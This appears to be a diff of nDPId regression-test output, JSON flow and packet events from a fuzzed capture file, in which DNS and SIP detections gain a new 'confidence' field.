 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469847979,"flow_last_seen":1120469856989,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1120469938907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469938907,"pkt":"ADBUADRWAODtAW69CABFAABEaj8AAIARTRbAqAECwKgBAQqxADUAMAoxGt0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1120469938908,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469938908,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAF8Rtz7AqAEBwKgBAgA1CrEAR+ysGt2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAVgwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469938908,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469938908,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1120469938910,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"ts_msec":1120469938910,"pkt":"ADBUADRWAODtAW69CABFAAHvakAAAIARFv7AqAEC1PIhI1HEE8QB28mlUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTE0NjM5MDAwLTQ3N2U3NTkxMTkyLjE2OC4xLjI7JXMAcnQNCkZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5k9T47dGFnPTZkNTQwYTUNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHlzZGs+DQpDYWxuLUlEOiA1NzgyVDI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2MkAxOTIuMTY4LjEuMjo1MDYwO2xpbmU9YWNhNmI5N2NhM2Y1MTUxYT47ZXhwaXJlcx0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANe0NTZXE6IDc0IFLPR0lTVEVSDQpDb250ZUF0LUxlbmd0aDogMA0KTWF4LUZvcglhcmRzOiA3MA0KaXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNl8KDQo="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1120469939223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469939223,"pkt":"ADBUADRWAODtAW69CABFAABIakEAAIARTRDAqAECwKhUAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR1AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercitu.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercitu.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1120469940218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469940218,"pkt":"ADBUADRWAODtAW69CABFAABIakIAAIARTQ\/AqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1120469942221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469942221,"pkt":"ADBUADRWAODtAW69CABFAABIakMAAIARTQ7AqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1120469944224,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469944224,"pkt":"ADBUADRWAODtAW69CABFAABIakQAAIARTQ3AqAECwKgBAQqcADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1120469948230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469948230,"pkt":"ADBUADRWAODtAW69CABFAABIakUAAIARTQzAqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1120469956232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469956232,"pkt":"ADBUADRWAODtAW69CABFAABEakYAAIARTQ\/AqAECwKgBAQqzADUAMLotat4AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1120469956233,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469956233,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrMAR5ypat6AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469956233,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
